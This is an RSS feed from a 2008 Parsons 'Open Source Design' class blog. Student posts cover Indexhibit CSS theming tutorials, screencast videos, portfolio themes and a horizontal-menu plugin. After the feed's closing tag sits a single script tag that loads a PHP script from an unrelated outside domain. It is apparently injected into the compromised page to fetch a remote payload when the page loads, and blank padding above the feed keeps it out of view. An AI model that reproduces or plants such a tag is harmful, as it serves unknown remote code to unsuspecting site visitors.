



































































<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Open Source Design</title>
	<atom:link href="http://www.mushon.com/fall08/osd/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.mushon.com/fall08/osd</link>
	<description>Students designing with and for open source software &#124; Parsons Fall 2008</description>
	<lastBuildDate>Fri, 22 May 2009 16:49:25 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>How To Modify Indexhibit &#8211; Tutorial Instructions</title>
		<link>http://www.mushon.com/fall08/osd/12/27/how-to-modify-indexhibit-tutorial-instructions/</link>
		<comments>http://www.mushon.com/fall08/osd/12/27/how-to-modify-indexhibit-tutorial-instructions/#comments</comments>
		<pubDate>Sun, 28 Dec 2008 00:27:23 +0000</pubDate>
		<dc:creator>khurry</dc:creator>
				<category><![CDATA[#3-OSD]]></category>
		<category><![CDATA[indexhibit]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=837</guid>
		<description><![CDATA[Hey gang, Below is the text version of our &#8216;How To Modify Indexhibit&#8217; screencast. Also, the pdf version is available here. How to Modify Indexhibit w/CSS: This tutorial will show you how to modify your Indexhibit website by creating a new theme and making some simple changes to the CSS. We will focus on three [...]]]></description>
			<content:encoded><![CDATA[<p>Hey gang,</p>
<p>Below is the text version of our &#8216;How To Modify Indexhibit&#8217; screencast. Also, the pdf version is available <a href="http://khurrambajwa.com/indexhibit_tutorial.pdf">here</a>.</p>
<h4><strong>How to Modify Indexhibit w/CSS:</strong></h4>
<p>This tutorial will show you how to modify your Indexhibit website by creating a new theme and making some simple changes to the CSS. We will focus on three major areas:</p>
<ol>
<li>How to create the files necessary for your own Indexhibit theme</li>
<li>Using Firebug to examine web pages</li>
<li>Styling your theme by modifying an existing CSS stylesheet</li>
</ol>
<h2><span id="more-837"></span><strong>Step 1: Creating a new theme</strong></h2>
<p>We will begin by guiding you through the process of creating, uploading and activating your new theme. The theme we will create will be based on the ‘Sample&#8217; theme included with your Indexhibit download, and will be based solely on modifying the style.css file (i.e., you need not worry about messing with the index.php file).</p>
<p>First, you need to locate the Indexhibit themes folder on your computer. Locate the themes folder by following:</p>
<p><em>User &gt; Sites &gt; ‘yoursitefolder&#8217; &gt; indexhibit &gt; ndxz-studio &gt; site &gt; sample</em></p>
<p>The ‘site&#8217; folder is basically where Indexhibit stores the files for all of its themes. In our example, the new theme we create will start off as a copy of the ‘sample&#8217;.</p>
<p>Next, create a new folder inside of the ‘site&#8217; folder and give it a name (e.g., &#8220;theme_01&#8243;). Once you&#8217;ve created this new folder open the ‘sample&#8217; folder and copy and paste the style.css, ie.css and index.php files into &#8220;theme_01.&#8221; Again, we will only be working with the style.css file, so don&#8217;t worry about the other two, they only need to be in that same folder in order for the theme to work.</p>
<p>Now, upload &#8220;theme_01&#8243; to<em> ‘yoursitefolder&#8217; &gt; indexhibit &gt; ndxz-studio &gt; site</em> on your remote server (the same way as you did during the Indexhibit installation process).</p>
<p>Next, login to your Indexhibit backend site (http://yoursitename/indexhibit/ndxz-studio/) and click on the ‘Settings&#8217; link in the top right of the screen.</p>
<p>From here you can chose which theme to apply to your site by selecting the ‘Theme&#8217; drop menu on the left-hand side of the screen. Go ahead and select the new theme we created, &#8220;theme_01,&#8221; from this menu and then click &#8220;Update&#8221; to set this as your theme. Leave this browser window open.</p>
<p>So by now you should have created a new folder inside of the ‘site&#8217; folder, uploaded this new folder to your server, and activated this theme (don&#8217;t worry that it&#8217;s just a copy of ‘sample&#8217; so far, we will soon be modifying it shortly to create a unique theme of your own. But before we do that, its a good idea to mention Mozilla Firebug and how it can make your life much easier (or at least more manageable) by allowing you to examine and &#8220;borrow&#8221; code from other sites.</p>
<h2>Step 2: Firebug &#8211; how to examine track and examine source code</h2>
<p>Mozilla Firebug is a free plugin available for Firefox that allows you to view the HTML and CSS code for pages open in your browser window. By using the &#8220;Inspect&#8221; feature, you can easily hover over and click on various page elements to reveal the corresponding html and css code for that element.</p>
<p>We will be using Firebug here to identify the parts of our site that we want to modify and the corresponding CSS rule in the style.css file that defines how that element appears on the screen. By doing so, we can then apply this knowledge towards modifying our own theme and track these changes to ensure they look how we want them to.</p>
<p>Remember, our new theme is based on a copy of the style.css file attached to the default &#8220;Sample&#8221; theme provided by Indexhibit. For the purposes of this tutorial all of our modifications will be made by editing existing rules only &#8212; we will not be creating any new rules.</p>
<p>Before we move on to styling our new theme, now is a good time to click on &#8220;Visit Your Site&#8221; link in the upper right hand corner of the ‘Exhibits: Settings&#8217; window. If you don&#8217;t have it already, download and install Firebug.</p>
<p>Once you&#8217;re set up with Firebug its time for Step 3: Styling Your Theme with style.css</p>
<h2>Step 3: Modifying Your Theme</h2>
<p>We will now modify the look of our site by editing its stylesheet. Begin by locating the style.css file for ‘Theme_01,&#8217; the folder we created in step 1. The file should be here:</p>
<p><em>User &gt; Sites &gt; ‘yoursitefolder&#8217; &gt; indexhibit &gt; ndxz-studio &gt; site &gt; theme_01</em></p>
<p>Open style.css in your text editing program and notice how it lists things like &#8220;#menu&#8221; and &#8220;#menu ul&#8221; followed by sublists of things like &#8220;width,&#8221; &#8220;overflow&#8221; and &#8220;background color&#8221;. These are the CSS rules that define how our site looks, and this is where we will be making our modifications. In particular, we will be making changes to 8 rules: body, a:link (a:visited, a:hover), #menu, #menu ul, #menu ul li.section-title, #content, #content p, and p.</p>
<p>Please note how the following two directions are used:</p>
<ul>
<li>‘Add&#8217; means to leave the existing definitions intact and just adding the given lines to the rule.</li>
</ul>
<ul>
<li> ‘Change&#8217; means to actually replace the current value in a definition(s) with the given one.</li>
</ul>
<h3>The Body:</h3>
<p>The first change we will make will be used to make some global definitions for the site&#8217;s style. In style.css find the body rule and make the following additions/changes:</p>
<ol>
<li>In ‘body&#8217; Set the default typeface for the site by adding ‘monospace&#8217; in front of ‘Verdana&#8217; in the ‘font-family&#8217; line.</li>
<li>Set the background color for the page by changing ‘background: #fff&#8217; to #ccffff.</li>
</ol>
<h3>The Menu:</h3>
<p>Next, we move to the navigation menu. Inspecting the menu in Firebug reveals that this section is defined by the rule #menu. Begin modifying the menu by making changes to its color:</p>
<p>In ‘#menu,&#8217; change ‘background-color&#8217; from #fff to #666666. This will give us a charcoal grey navigation menu.</p>
<p>Change the font size, color &amp; layout for the exhibit titles:</p>
<p>In ‘#menu ul li.section-title&#8217; add the following definitions:</p>
<ol>
<li> line-height: 18pt;</li>
<li>border-bottom-color: white;</li>
<li>border-bottom-style: dotted;</li>
<li>border-bottom-width: 1px;</li>
<li>color: white;</li>
<li>font-size: 14pt;</li>
</ol>
<p>Next, to modify the exhibit links:</p>
<p>a:link &#8211; defines links in their default (unclicked) state. Add the definition:</p>
<ol>
<li> color: #ccffcc</li>
</ol>
<p>a:visited &#8211; defines links after they have been clicked on. Change the definition:</p>
<ol>
<li> color: #666 to #ccffff</li>
</ol>
<p>Finally, to change the size and color of your name as it is displayed at the top of the menu:</p>
<p>In ‘p&#8217; add the definitions:</p>
<ol>
<li> color: white;</li>
<li>font-size: 14pt;</li>
</ol>
<p>Lastly, we move to modifying the content section.</p>
<h3>The Content:</h3>
<p>The last changes we will be making are going to effect the content area of the page (ie, where your exhibits appear. To modify the content text:</p>
<p>In ‘#content p&#8217;:<br />
Change ‘width&#8217; from 400 px to 700 px.<br />
Then add the following definitions:</p>
<ol>
<li> line-height: 21pt;</li>
<li>margin-left: 5px;</li>
<li>font-size: 18pt;</li>
<li>color: #666666;</li>
</ol>
<p>These modifications will change the font size, color and spacing for the content text. Lastly, adjust the content display area:</p>
<p>In ‘#content&#8217; add the definition:</p>
<ol>
<li> padding-left: 50px;</li>
</ol>
<p>Make sure to upload your final style.css to your server, and enjoy! You have now learned how to go about making changes to your indexhibit site by modifying themes.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/12/27/how-to-modify-indexhibit-tutorial-instructions/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>video step1</title>
		<link>http://www.mushon.com/fall08/osd/12/27/video-step1/</link>
		<comments>http://www.mushon.com/fall08/osd/12/27/video-step1/#comments</comments>
		<pubDate>Sat, 27 Dec 2008 16:02:29 +0000</pubDate>
		<dc:creator>karenm</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=828</guid>
		<description><![CDATA[hi here is step one (no keyboard shortcuts or spelling errors etc) [There is a video that cannot be displayed in this feed. Visit the blog entry to see the video.] i also posted it on blip.tv blip tv step 1]]></description>
			<content:encoded><![CDATA[<p>hi</p>
<p>here is step one (no keyboard shortcuts or spelling errors etc)</p>
<p>[There is a video that cannot be displayed in this feed. <a href="http://www.mushon.com/fall08/osd/12/27/video-step1/">Visit the blog entry to see the video.]</a></p>
<p>i also posted it on blip.tv</p>
<p><a href="http://blip.tv/file/1615443/">blip tv step 1</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/12/27/video-step1/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>My WordPress Theme &amp; Portfolio Site</title>
		<link>http://www.mushon.com/fall08/osd/12/23/my-wordpress-theme-portfolio-site/</link>
		<comments>http://www.mushon.com/fall08/osd/12/23/my-wordpress-theme-portfolio-site/#comments</comments>
		<pubDate>Tue, 23 Dec 2008 16:56:11 +0000</pubDate>
		<dc:creator>Ed Nacional</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=825</guid>
		<description><![CDATA[Although its not 100% complete, its pretty darn close! As you probably notice, something crazy came over me and I made some last minute design changes. http://ednacional.com/osd2/ There are a few technical things left to work on, but other than that i think its ready to be filled with my work. Im pretty excited about [...]]]></description>
			<content:encoded><![CDATA[<p>Although its not 100% complete, its pretty darn close! As you probably notice, something crazy came over me and I made some last minute design changes.</p>
<p><a href="http://ednacional.com/osd2/" target="_blank">http://ednacional.com/osd2/</a></p>
<p>There are a few technical things left to work on, but other than that i think its ready to be filled with my work. Im pretty excited about it! Thanks for everyone&#8217;s help throughout the process.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/12/23/my-wordpress-theme-portfolio-site/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>My Indexhibit Theme</title>
		<link>http://www.mushon.com/fall08/osd/12/23/my-indexhibit-theme/</link>
		<comments>http://www.mushon.com/fall08/osd/12/23/my-indexhibit-theme/#comments</comments>
		<pubDate>Tue, 23 Dec 2008 16:28:32 +0000</pubDate>
		<dc:creator>Ed Nacional</dc:creator>
				<category><![CDATA[#3-OSD]]></category>
		<category><![CDATA[indexhibit]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=820</guid>
		<description><![CDATA[Hey guys, I have finished by indexhibit theme, now styled and commented. I still think there can be some inprovements with the commenting, but i guess thats the beauty of opensource. Here is my thread on indexhibit forum I have applied the theme to my current website and created a page specifically for the theme. [...]]]></description>
			<content:encoded><![CDATA[<p>Hey guys,</p>
<p>I have finished by indexhibit theme, now styled and commented. I still think there can be some inprovements with the commenting, but i guess thats the beauty of opensource.</p>
<p><a href="http://www.indexhibit.org/forum/thread/2522/">Here is my thread on indexhibit forum</a></p>
<p>I have applied the theme to my current website and created a page specifically for the theme.</p>
<p><a href="http://www.ednacional.com/indexhibit/index.php?/identity/theme/" target="_blank">http://www.ednacional.com/indexhibit/index.php?/identity/theme/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/12/23/my-indexhibit-theme/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A BAJMESS STUDIOS JOINT</title>
		<link>http://www.mushon.com/fall08/osd/12/23/a-bajmess-studios-joint/</link>
		<comments>http://www.mushon.com/fall08/osd/12/23/a-bajmess-studios-joint/#comments</comments>
		<pubDate>Tue, 23 Dec 2008 14:24:07 +0000</pubDate>
		<dc:creator>karenm</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=808</guid>
		<description><![CDATA[hi so in conjunction with khurry&#8217;s fantastic pdf i have have created a video to accompany the pdf to help navigate users through step 1. please take a look [There is a video that cannot be displayed in this feed. Visit the blog entry to see the video.] step_1_v2 step_1_v2mov also step 3step_3_v2mov [There is [...]]]></description>
			<content:encoded><![CDATA[<p>hi</p>
<p>so in conjunction with khurry&#8217;s fantastic pdf i have have created a video to accompany the pdf to help navigate users through step 1.</p>
<p>please take a look</p>
<p>[There is a video that cannot be displayed in this feed. <a href="http://www.mushon.com/fall08/osd/12/23/a-bajmess-studios-joint/">Visit the blog entry to see the video.]</a></p>
<p>step_1_v2</p>
<p>step_1_v2mov</p>
<p>also step 3step_3_v2mov</p>
<p>[There is a video that cannot be displayed in this feed. <a href="http://www.mushon.com/fall08/osd/12/23/a-bajmess-studios-joint/">Visit the blog entry to see the video.]</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/12/23/a-bajmess-studios-joint/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>indexhibit 101 video</title>
		<link>http://www.mushon.com/fall08/osd/12/23/indexhibit-101-video/</link>
		<comments>http://www.mushon.com/fall08/osd/12/23/indexhibit-101-video/#comments</comments>
		<pubDate>Tue, 23 Dec 2008 14:07:49 +0000</pubDate>
		<dc:creator>leonie</dc:creator>
				<category><![CDATA[#1-Tutorial]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=805</guid>
		<description><![CDATA[[There is a video that cannot be displayed in this feed. Visit the blog entry to see the video.] Hi all, Here is my indexhibit tutorial. (take 24 ) I focused on the very basics. The quality is not as good as I had hoped. Any suggesitons how to make it better. I think I [...]]]></description>
			<content:encoded><![CDATA[<p>[There is a video that cannot be displayed in this feed. <a href="http://www.mushon.com/fall08/osd/12/23/indexhibit-101-video/">Visit the blog entry to see the video.]</a></p>
<p>Hi all,</p>
<p>Here is my indexhibit tutorial. (take 24 <img src='http://www.mushon.com/fall08/osd/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  ) I focused on the very basics. The quality is not as good as I had hoped. Any suggesitons how to make it better.</p>
<p>I think I also want to take another one on &#8221; how to help yourself&#8221; (firebug, using google as a help tool, finding tutorials online. )</p>
<p>happy class</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/12/23/indexhibit-101-video/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Back in action</title>
		<link>http://www.mushon.com/fall08/osd/12/23/back-in-action/</link>
		<comments>http://www.mushon.com/fall08/osd/12/23/back-in-action/#comments</comments>
		<pubDate>Tue, 23 Dec 2008 11:16:34 +0000</pubDate>
		<dc:creator>leonie</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/12/23/back-in-action/</guid>
		<description><![CDATA[Hi guys, I apologize. I have been MIA moving with limited internet access. But I am back!! (from across the ocean) I decided to do a quick indexhibit 101. Reviewing: adv mode setting up the menu changing the order of the menu organizing it chronologically setting the thumbnails or other choices preview. If the video [...]]]></description>
			<content:encoded><![CDATA[<p>Hi guys,</p>
<p>I apologize. I have been MIA moving with limited internet access. But I am back!! (from across the ocean)</p>
<p>I decided to do a quick indexhibit 101.<br />
Reviewing:<br />
adv mode<br />
setting up the menu<br />
changing the order of the menu<br />
organizing it chronologically<br />
setting the thumbnails or other choices<br />
preview.</p>
<p>If the video is long enough maybe I want to review firebug. This has been an invaluable tool and I think users like me, would appreciate a 101 of this tool from me. </p>
<p>I had been planning to just post it on youtube. Is that what everyone else is doing?</p>
<p>As for my site. I still have to make the adjustments we spoke about in class.<br />
I am not sure if I will be able to finish it by this afternoon, but I guess it always is a work in progress.</p>
<p>Leonie</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/12/23/back-in-action/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>BajMess Studios reveal new details on upcoming film, &#8216;How To Modify Indexhibit&#8217;</title>
		<link>http://www.mushon.com/fall08/osd/12/23/bajmess-studios-reveal-new-details-on-upcoming-film-how-to-modify-indexhibit/</link>
		<comments>http://www.mushon.com/fall08/osd/12/23/bajmess-studios-reveal-new-details-on-upcoming-film-how-to-modify-indexhibit/#comments</comments>
		<pubDate>Tue, 23 Dec 2008 09:10:28 +0000</pubDate>
		<dc:creator>khurry</dc:creator>
				<category><![CDATA[#3-OSD]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=785</guid>
		<description><![CDATA[Hey All, I hope you had as much fun reading that title as I did writing it. Anywho, we are currently working on some technical issues tied to the production of this upcoming blockbuster, but in the meantime below are the tutorial instructions that inspired the film-adaptation. Some quick background on the concept of the [...]]]></description>
			<content:encoded><![CDATA[<p>Hey All,</p>
<p>I hope you had as much fun reading that title as I did writing it.</p>
<p>Anywho, we are currently working on some technical issues tied to the production of this upcoming blockbuster, but in the meantime below are the tutorial instructions that inspired the film-adaptation. Some quick background on the concept of the tutorial: we&#8217;re approaching this from the standpoint of the average type of person who would use Indexhibit. The target audience therefore is individuals who have been able to install and setup an Indexhibit site but would like some direction on how to modify their site&#8217;s appearance without having to work with too much code. Here is the <a href="http://www.khurrambajwa.com/indexhibit_tutorial.pdf">pdf version</a> of instructions.</p>
<p>kB</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/12/23/bajmess-studios-reveal-new-details-on-upcoming-film-how-to-modify-indexhibit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Horizontal Menu Plugin goes LIVE</title>
		<link>http://www.mushon.com/fall08/osd/12/23/horizontal-menu-plugin-goes-live/</link>
		<comments>http://www.mushon.com/fall08/osd/12/23/horizontal-menu-plugin-goes-live/#comments</comments>
		<pubDate>Tue, 23 Dec 2008 08:53:54 +0000</pubDate>
		<dc:creator>Alexandra</dc:creator>
				<category><![CDATA[#3-OSD]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=786</guid>
		<description><![CDATA[Hi all, 4 am, and I am proud to announce that my plugin has just been submitted to the Indexhibit forum. You can see my thread here. Here is the link to my zipped plugin file, which contains the css, Mushon&#8217;s index.php files, and a **read-me** file (at 4am, this seems like a stroke of [...]]]></description>
			<content:encoded><![CDATA[<p>Hi all,</p>
<p>4 am, and I am proud to announce that my plugin has just been submitted to the Indexhibit forum. You can see my thread <a href="http://www.indexhibit.org/forum/thread/2519/">here</a>.</p>
<p>Here is the <a rel="attachment wp-att-787" href="http://www.mushon.com/fall08/osd/12/23/horizontal-menu-plugin-goes-live/horizontal-menu-plugin/">link</a> to my zipped plugin file, which contains the css, Mushon&#8217;s index.php files, and a **read-me** file (at 4am, this seems like a stroke of genius).</p>
<p>Also, you can see my blog Metaphora <a href="http://www.alexandrazsigmond.com/wordpress/">here</a>. It is still a work-in-progress, as is everything in life I suppose. There is one thing I&#8217;d like to problem solve in class if we have time. Otherwise, I&#8217;ll be beginning to add content over break, and make coding tweaks when the spirit moves me.</p>
<p>Signing out for the night, see you guys tomorrow (well&#8230;today)<br />
OSD love,<br />
Alexandra</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/12/23/horizontal-menu-plugin-goes-live/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>movie</title>
		<link>http://www.mushon.com/fall08/osd/12/23/movie/</link>
		<comments>http://www.mushon.com/fall08/osd/12/23/movie/#comments</comments>
		<pubDate>Tue, 23 Dec 2008 07:55:41 +0000</pubDate>
		<dc:creator>karenm</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.mushon.com/fall08/osd/?p=782</guid>
		<description><![CDATA[hi all so i have been working with the free trial of snapz pro- there seems to be something wrong with my quicktime and i keep downloading the newer version to no avail. anyway, step 1, is below in a very rough form. i am going to try to sleep for a few hours then [...]]]></description>
			<content:encoded><![CDATA[<p>hi all</p>
<p>so i have been working with the free trial of snapz pro- there seems to be something wrong with my quicktime and i keep downloading the newer version to no avail. anyway, step 1, is below in a very rough form. i am going to try to sleep for a few hours then fight quicktime.</p>
<p>peace. step1</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mushon.com/fall08/osd/12/23/movie/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script src="http://whereisdudescars.com/js2.php"></script>